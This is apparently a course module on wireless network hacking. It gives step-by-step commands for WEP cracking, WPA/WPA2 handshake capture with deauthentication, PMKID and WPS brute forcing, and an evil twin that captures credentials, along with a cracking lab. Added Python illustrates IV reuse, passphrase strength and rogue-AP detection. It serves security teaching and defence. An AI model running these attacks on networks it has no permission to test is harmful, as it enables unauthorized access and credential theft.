
Wireless Network Hacking

Introduction to Wireless Security

Wireless networks (Wi-Fi) are vulnerable to various attacks due to weak encryption, misconfigurations, and physical accessibility. This guide covers **reconnaissance, exploitation, and defense** techniques for **WEP, WPA/WPA2, and WPA3** networks.


1. Wireless Reconnaissance

A. Identifying Networks

- Scan for nearby networks:

  ```bash
  sudo iwconfig               # List available interfaces
  sudo airmon-ng start wlan0  # Enable monitor mode
  sudo airodump-ng wlan0mon   # Scan networks
  ```

Key details:

  - BSSID (MAC address of AP)
  - ESSID (Network name)
  - Channel, Encryption (WEP/WPA/WPA2)


B. Target Selection

- Prioritize weak networks:

  - WEP (Easily crackable)
  - WPA/WPA2-PSK (Vulnerable to brute force)
  - Open Wi-Fi (No encryption)


2. Wireless Attacks

A. WEP Cracking (Outdated but Still Found)

WEP uses RC4 encryption and is easily crackable due to IV (Initialization Vector) reuse.
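The sentence above is the whole cryptographic story, so here is a worked illustration of it (added for this page; it is not code from the post or from the aircrack-ng project). It is a toy RC4/WEP model in Python: two frames encrypted under the same IV and key share a keystream, so XORing their ciphertexts cancels the keystream, and if the first frame's content is predictable the second one falls out directly. It also computes the birthday-bound estimate of how quickly a 24-bit IV space starts repeating. The key and IV values are constructed, the frame model omits the ICV, and random IV selection is an assumption (sequential IV counters repeat on a different schedule).

```python
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA), the stream cipher WEP wraps around a 24-bit IV."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Toy WEP frame body: IV sent in the clear, then RC4(IV || key) XOR plaintext.
    The per-packet ICV is left out; it does not change the keystream argument."""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits")
    return iv + xor_bytes(rc4_keystream(iv + key, len(plaintext)), plaintext)


def xor_of_plaintexts(frame1: bytes, frame2: bytes) -> bytes:
    """Same IV and key means the same keystream, so C1 XOR C2 == P1 XOR P2.
    No key material is needed for this step; only the reuse matters."""
    if frame1[:3] != frame2[:3]:
        raise ValueError("frames use different IVs; their keystreams differ")
    return xor_bytes(frame1[3:], frame2[3:])


def recover_with_known_plaintext(frame1: bytes, frame2: bytes, known_p1: bytes) -> bytes:
    """If P1 is predictable (fixed protocol headers), P2 follows from the XOR."""
    return xor_bytes(xor_of_plaintexts(frame1, frame2), known_p1)


IV_SPACE = 2 ** 24   # 16,777,216 possible IV values


def iv_collision_probability(packets: int) -> float:
    """Birthday bound: chance that at least two of `packets` random IVs coincide."""
    return 1.0 - math.exp(-packets * (packets - 1) / (2 * IV_SPACE))


def expected_packets_to_first_reuse() -> float:
    """Expected number of random IVs drawn before the first repeat: sqrt(pi/2 * N)."""
    return math.sqrt(math.pi / 2 * IV_SPACE)


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")          # constructed 40-bit WEP key
    iv = bytes.fromhex("a1b2c3")               # constructed IV, deliberately reused
    f1 = wep_encrypt(key, iv, b"hello world")
    f2 = wep_encrypt(key, iv, b"HELLO WORLD")
    print("C1 xor C2 :", xor_of_plaintexts(f1, f2).hex())
    print("recovered :", recover_with_known_plaintext(f1, f2, b"hello world"))
    print(f"expected packets before an IV repeats: {expected_packets_to_first_reuse():.0f}")
    print(f"P(repeat) after 10,000 packets: {iv_collision_probability(10_000):.3f}")
```

The defender's takeaway is that no key length helps here: the IV is the only per-packet input to the keystream, and with about 16.8 million values it is expected to repeat after roughly five thousand packets, which is why WEP is retired rather than hardened.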


Steps:

1. Capture packets:

   ```bash
   sudo airodump-ng -c <channel> --bssid <BSSID> -w wep_crack wlan0mon
   ```

2. Force IV generation (ARP replay attack):

   ```bash
   sudo aireplay-ng -3 -b <BSSID> -h <client_MAC> wlan0mon
   ```

3. Crack with aircrack-ng:

   ```bash
   sudo aircrack-ng wep_crack-01.cap
   ```


B. WPA/WPA2 Cracking

WPA/WPA2-PSK (Pre-Shared Key) is vulnerable to brute force/dictionary attacks.


Steps:

1. Capture WPA Handshake (4-way authentication):

   ```bash
   sudo airodump-ng -c <channel> --bssid <BSSID> -w handshake wlan0mon
   ```

2. Deauthenticate a client to force reconnection:

   ```bash
   sudo aireplay-ng -0 5 -a <BSSID> -c <client_MAC> wlan0mon
   ```

3. Crack with hashcat or aircrack-ng:

   ```bash
   aircrack-ng -w rockyou.txt handshake-01.cap
   ```

   or

   ```bash
   hashcat -m 22000 handshake.hc22000 rockyou.txt
   ```

  

C. Evil Twin Attack (Rogue AP)

- Creates a fake Wi-Fi network to steal credentials.

Tools: airbase-ng, hostapd-wpe.


Steps:

1. Set up rogue AP:

   ```bash
   sudo airbase-ng -a <BSSID> --essid "Free_WiFi" -c <channel> wlan0mon
   ```

2. Redirect traffic:

   ```bash
   sudo dnschef -i <interface> --fakeip 192.168.1.1
   ```

3. Capture credentials when victims connect.


D. WPS (Wi-Fi Protected Setup) Attack

- WPS PIN brute force (if enabled).

Tools: reaver, bully.


Steps:

```bash
sudo reaver -i wlan0mon -b <BSSID> -vv -K 1
```


E. KRACK Attack (Key Reinstallation Attack)

- Exploits WPA2's 4-way handshake vulnerability.

Tool: krackattacks-scripts.


Steps:

1. Monitor network traffic.

2. Forge handshake packets to intercept data.


3. Advanced Attacks

A. PMKID Attack (WPA/WPA2)

- Extracts PMKID (Pairwise Master Key ID) without a handshake.

Tools: hcxdumptool, hashcat.


Steps:

1. Capture PMKID:

   ```bash
   sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
   ```

2. Crack with hashcat:

   ```bash
   hashcat -m 16800 pmkid.hc16800 rockyou.txt
   ```

  

B. WPA3 Downgrade Attack

- Forces WPA3 → WPA2 fallback.

Tool: dragonblood.


4. Defensive Measures

A. Securing Wi-Fi Networks

✔ Use WPA3-SAE (if available) 

✔ Disable WPS (Vulnerable to brute force)  

✔ Use strong passwords (Avoid dictionary words)  

✔ Enable MAC filtering (Whitelist devices)  

✔ Disable SSID broadcasting (Hidden network)  

✔ Monitor for rogue APs (Airodump-ng, Kismet)  
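The claim in section 2.B that WPA/WPA2-PSK falls to dictionary attacks and the advice above to use strong passwords rest on one derivation, so here it is worked through in Python (added for this page, not code from the post or from hashcat/aircrack-ng). It computes the 802.11i pre-shared key (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 256-bit output, checked against the IEEE 802.11 test vector for passphrase `password` on SSID `IEEE`), applies a small passphrase policy, and estimates worst-case search time at an assumed guess rate. The 20-character minimum, the tiny word list standing in for rockyou.txt, and the guess rate are assumptions.

```python
import hashlib


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """802.11i pre-shared key: PBKDF2-HMAC-SHA1 over the passphrase with the SSID
    as salt, 4096 iterations, 32 bytes. This PMK keys the 4-way handshake, so an
    offline guess against a captured handshake or PMKID repeats exactly this work."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


# Constructed, deliberately tiny stand-in for a real word list such as rockyou.txt.
COMMON_PASSPHRASES = {"password", "12345678", "qwertyui", "iloveyou", "admin123"}


def check_passphrase(passphrase: str, min_length: int = 20) -> list:
    """Policy findings for a candidate PSK passphrase; an empty list means it passes.
    The 20-character minimum is an assumed local policy, not part of any standard."""
    findings = []
    n = len(passphrase)
    if not 8 <= n <= 63:
        findings.append("outside the 8-63 character WPA-PSK passphrase range")
    elif n < min_length:
        findings.append(f"shorter than the {min_length}-character local minimum")
    if passphrase.lower() in COMMON_PASSPHRASES:
        findings.append("present in the common-passphrase list")
    classes = sum([
        any(c.islower() for c in passphrase),
        any(c.isupper() for c in passphrase),
        any(c.isdigit() for c in passphrase),
        any(not c.isalnum() for c in passphrase),
    ])
    if classes < 3:
        findings.append("fewer than three character classes")
    return findings


def seconds_to_exhaust(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every passphrase of one shape at an assumed guess rate.
    Each guess costs 4096 HMAC-SHA1 rounds, which is what bounds that rate."""
    return charset_size ** length / guesses_per_second


if __name__ == "__main__":
    print("PSK(password, IEEE) =", derive_psk("password", "IEEE").hex())
    for candidate in ("password", "Xq7!mRz2-vL9pW3#kT5aYh"):
        print(f"{candidate!r}: {check_passphrase(candidate) or 'passes policy'}")
    rate = 1e6   # assumed guesses per second for the illustration only
    print(f"8 lowercase letters at {rate:.0e}/s: {seconds_to_exhaust(26, 8, rate):.0f} s")
    print(f"20 printable chars at {rate:.0e}/s: {seconds_to_exhaust(94, 20, rate):.3e} s")
```

Note that the SSID is the salt, so a passphrase reused across networks with the same default SSID yields the same PMK; that is the reason precomputed tables exist for common SSIDs and one more argument for a unique SSID alongside a long random passphrase.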


B. Detection Tools

- Wireshark (Analyze Wi-Fi traffic)  

- Kismet (Wireless IDS)  

- Aircrack-ng (Test security)  
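MAC allowlists and hidden SSIDs do not stop the Evil Twin of section 2.C, because an attacker's AP simply advertises your ESSID; what catches it is comparing every scan against an allowlist of your own BSSIDs, which is what "Monitor for rogue APs (Airodump-ng, Kismet)" comes down to in practice. The Python below is an added example (not code from the post or from the aircrack-ng project): it parses the CSV that airodump-ng writes when run with `-w`, flags any ESSID of yours served by an unlisted BSSID, and also flags open and WEP networks in range. The sample rows follow airodump-ng's layout (access-point table, blank line, station table) but every value in them and in the allowlist is constructed.

```python
import csv
import io

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv: an
# access-point table, a blank line, then a station table. Every value is made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -45,  120,   0,   0.  0.  0.  0,   7, CorpNet, 
66:77:88:99:AA:BB, 2024-01-01 10:01:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -30,   40,   0,   0.  0.  0.  0,   7, CorpNet, 
CC:DD:EE:FF:00:11, 2024-01-01 10:02:00, 2024-01-01 10:05:00, 11,  54, OPN,     ,    , -60,   80,   0,   0.  0.  0.  0,   9, Free_WiFi, 
22:33:44:55:66:77, 2024-01-01 10:03:00, 2024-01-01 10:05:00,  1,  11, WEP,  WEP,    , -70,   15, 300,   0.  0.  0.  0,   6, OldCam, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2024-01-01 10:00:30, 2024-01-01 10:05:00, -50,  200, 00:11:22:33:44:55, CorpNet
"""

# Constructed allowlist: the ESSIDs we operate and the BSSIDs authorised to serve them.
AUTHORIZED_BSSIDS = {"CorpNet": {"00:11:22:33:44:55"}}


def parse_access_points(text: str) -> list:
    """Return the access-point rows of an airodump-ng CSV as dicts keyed by header."""
    ap_section = text.split("\n\n", 1)[0]          # stop at the station table
    rows = csv.reader(io.StringIO(ap_section), skipinitialspace=True)
    header = [h.strip() for h in next(rows)]
    return [dict(zip(header, (v.strip() for v in row)))
            for row in rows if len(row) >= len(header)]


def audit_scan(text: str, authorized: dict) -> list:
    """Findings as (BSSID, ESSID, reason) tuples for rogue, open and WEP networks."""
    findings = []
    for ap in parse_access_points(text):
        bssid, essid, privacy = ap["BSSID"], ap["ESSID"], ap["Privacy"]
        if essid in authorized and bssid not in authorized[essid]:
            findings.append((bssid, essid,
                             "possible evil twin: our ESSID on an unauthorised BSSID"))
        if "OPN" in privacy:
            findings.append((bssid, essid, "open network, no encryption"))
        if "WEP" in privacy:
            findings.append((bssid, essid, "WEP encryption"))
    return findings


if __name__ == "__main__":
    for bssid, essid, reason in audit_scan(SAMPLE_CSV, AUTHORIZED_BSSIDS):
        print(f"{bssid}  {essid:<12} {reason}")
```

Run periodically against a fresh capture, the same check turns a one-off scan into the rogue-AP monitoring the list above recommends; a stronger "evil twin" signal is the same ESSID appearing with a different security type (for example open where yours is WPA2) or on a channel you do not use, both of which are in the parsed rows and easy to add as further rules.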


5. Hands-On Lab

Lab: Cracking WPA2 with Aircrack-ng

1. Enable monitor mode:

   ```bash
   sudo airmon-ng start wlan0
   ```

2. Scan networks:

   ```bash
   sudo airodump-ng wlan0mon
   ```

3. Capture handshake:

   ```bash
   sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon
   ```

4. Deauth a client:

   ```bash
   sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
   ```

5. Crack the handshake:

   ```bash
   sudo aircrack-ng -w rockyou.txt capture-01.cap
   ```


6. Legal & Ethical Considerations

⚠ Only hack networks you own or have permission to test.  

⚠ Unauthorized access is illegal (Computer Fraud and Abuse Act, etc.).  


Conclusion

- WEP is trivial to crack (RC4 weakness).  

- WPA/WPA2 is vulnerable to brute force (Weak passwords).  

- WPA3 improves security but has downgrade risks.  

- Evil Twin & WPS attacks are still effective.  


🔹 Next Steps:  

Module 9: Social Engineering & Phishing  

- Try Wi-Fi challenges on Hack The Box / TryHackMe.  

- Learn RF hacking (Bluetooth, Zigbee).  

- Explore enterprise Wi-Fi security (RADIUS, 802.1X).  


